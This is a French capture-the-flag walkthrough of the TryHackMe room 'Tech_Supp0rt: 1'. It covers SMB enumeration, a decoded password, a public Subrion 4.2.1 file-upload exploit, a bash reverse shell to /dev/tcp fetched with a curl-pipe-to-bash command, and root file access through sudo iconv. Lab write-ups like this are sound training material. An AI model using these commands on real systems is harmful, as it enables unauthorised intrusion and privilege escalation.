Lien de la room: TryHackMe | Tech_Supp0rt: 1

Énumération

Le scan Nmap nous donne le résultat suivant.

Rien d’extraordinaire

On essaie le port 80 et on tombe sur la page par défaut Ubuntu

La recherche par gobuster nous donne deux pages plutôt intéressantes: http://10.10.74.44/wordpress/ et http://10.10.74.44/test/

La page http://10.10.74.44/test/ semble être une page malveillante avec beaucoup de pop-ups.

La page http://10.10.74.44/wordpress/ semble être une page normal avec quelques codes d’erreur 404.

En parcourant un peu le site, on tombe sur un lien, qui nous dirige vers uns adresse différente que celle de base. En la modifiant pour celle de l’adresse IP de la cible de base, on tombe sur une page d’authenfication WordPress

Après avoir tenté quelques combinaisons et de l’injection SQL, rien d’intéressant ici pour le moment.

Vu que les ports 139 et 445 sont ouverts, on utilise smbclient pour interagir avec les serveurs Samba et accéder potentiellement à des partages de fichiers.

On voit trois partages disponibles. Les partages avec $ à la fin indiquent qu’ils sont cachés et ne sont pas visibles par tous. On peut donc accéder à \\10.10.74.44\websvr.

On accède au partage et on y voit un fichier enter.txt qu’on récupère sur notre machine.

Ce fichier contient des informations assez utiles, dont la possibilité de l’existence de Subrion, un système de gestion de contenu (CMS) et des identifiants de connexion.

On peut peut-être s’en servir pour se connecter à une interface?

Après une petite recherche google sur Subrion, on peut tester les panneaux d’administration Subrion aux addresses http://10.10.74.44/subrion, http://10.10.74.44/subrion/panel ou encore http://10.10.74.44/subrion/admin.

Après avoir testé les identifiants trouvés un peu plus haut, on a un message d’erreur au niveau de l’authentification.

Vu qu’on avait une note [cooked with magical formula], cela indique que le mot de passe est à décoder probablement. Je me rends donc sur https://www.dcode.fr/fr, au niveau du détecteur de chiffrement en premier.

On voit une indication d’un chiffrement en Base 58. En l’utilisant sur CyberChef on voit le mot de passe en clair.

On a accès à l’interface de Subrion.

En parcourant un peu le dahsboard, on a juste pas mal d’informations. Aucun mot de passe en clair, ou une indication sur tel ou tel indice.

On voit par contre la version du CMS qui est la 4.2.1.

En recherchant sur https://www.exploit-db.com/, on a quelques vulnérabilités de cette version ainsi que les CVEs.

Après avoir fouillé un peu, on peut tirer parti de la vulnérabilité Arbitrary File Upload de Subrion 4.2.1 pour déposer un shell et potentiellement obtenir un accès.

On se rend dans msfconsole ensuite, pour récupérer et adapter l’exploit avec la commande searchsploit -m php/webapps/49876.py

Le fichier est maintenant téléchargé. La prochaine étape est de le consulter et voir ce que fait le contenu.

Le script utilise optparse pour gérer les arguments. On peut donc ajouter les trois options -u pour l’URL cible, -l pour le nom d’utilisateur et -p pour le mot de passe.

Après avoir lancé l’exploit avec les bon paramètres, on est maintenant connecté sur la machine avec www-data.

On voit bien que l’exploit a uploadé un webshell à l’adresse http://10.10.123.58/subrion/panel/uploads/lpfotmxhylzwuss.phar.

Ce webshell (lpfotmxhylzwuss.phar) permet d’exécuter des commandes à distance via des requêtes HTTP, en PHP ici.

L’exploit 49876.py ici permet d’exécuter des commandes sur le serveur , mais il est limité au répertoire /var/www/html/subrion/uploads. Même lorsqu’on fait cd /, on se trouve toujours dans le répertoire /var/www/html/subrion/uploads.

Le webshell lpfotmxhylzwuss.phar est limité, on a pas de changement de répertoire. Il faut donc trouver un moyen d’avoir un shell interactif.

On va donc tenter d’obtenir un reverse shell, en y envoyant un payload qui se connecte à notre machine.

nano revshell.sh
#!/bin/bash
/bin/bash -i >& /dev/tcp/10.10.12.49/4444 0>&1

Ce code va créer un reverse shell vers notre machine. La prochaine étape serait de lancer un écouteur sur notre machine avec la commande nc -lvnp 4444 puis récupérer le fichier revshell.sh depuis le serveur subrion. La commande bash exécute le script téléchargé.

curl 10.10.12.49:8000/revshell.sh | bash

On a donc réussi à avoir le shell.

On peut voir ici qu’il y a un utilisateur du nom de scamsite.

Le fameux répertoire /test sort aussi des fichiers assez bizzares

Dans le répertoire /wordpress, on voit un fichier wp-config.php.

Bingo, dans ce fichier, on a des identifiants MySQL. Il peut s’agir d’identifiants pour accéder à une base de données WordPress? SSH? ou autre.

La tentative de se connecter à mysql fonctionne.

En parcourant le site de wordpress on arrive à se connecter avec les identifiants.

En parcourant le site, je n’ai rien d’intéressant.

Je retourne voir si je peux utiliser les identifiants trouvés.

Je vois que j’arrive à me connecter sur l’utilisateur scamsite avec le mot de passe trouvé.

La commande sudo -l afficher les commandes privilèges que l’utilisateur scamsite peut exécuter via sudo.

On voit qu’il peut exécuter usr/bin/iconv en tant que rootsans mot de passe. Après quelques recherches rapides, iconv est un utilitaire pour convertir des encodages de fichiers.

On exécute la commande sudo iconv -f utf-8 -t utf-8 /root/root.txt et on a le flag 😉.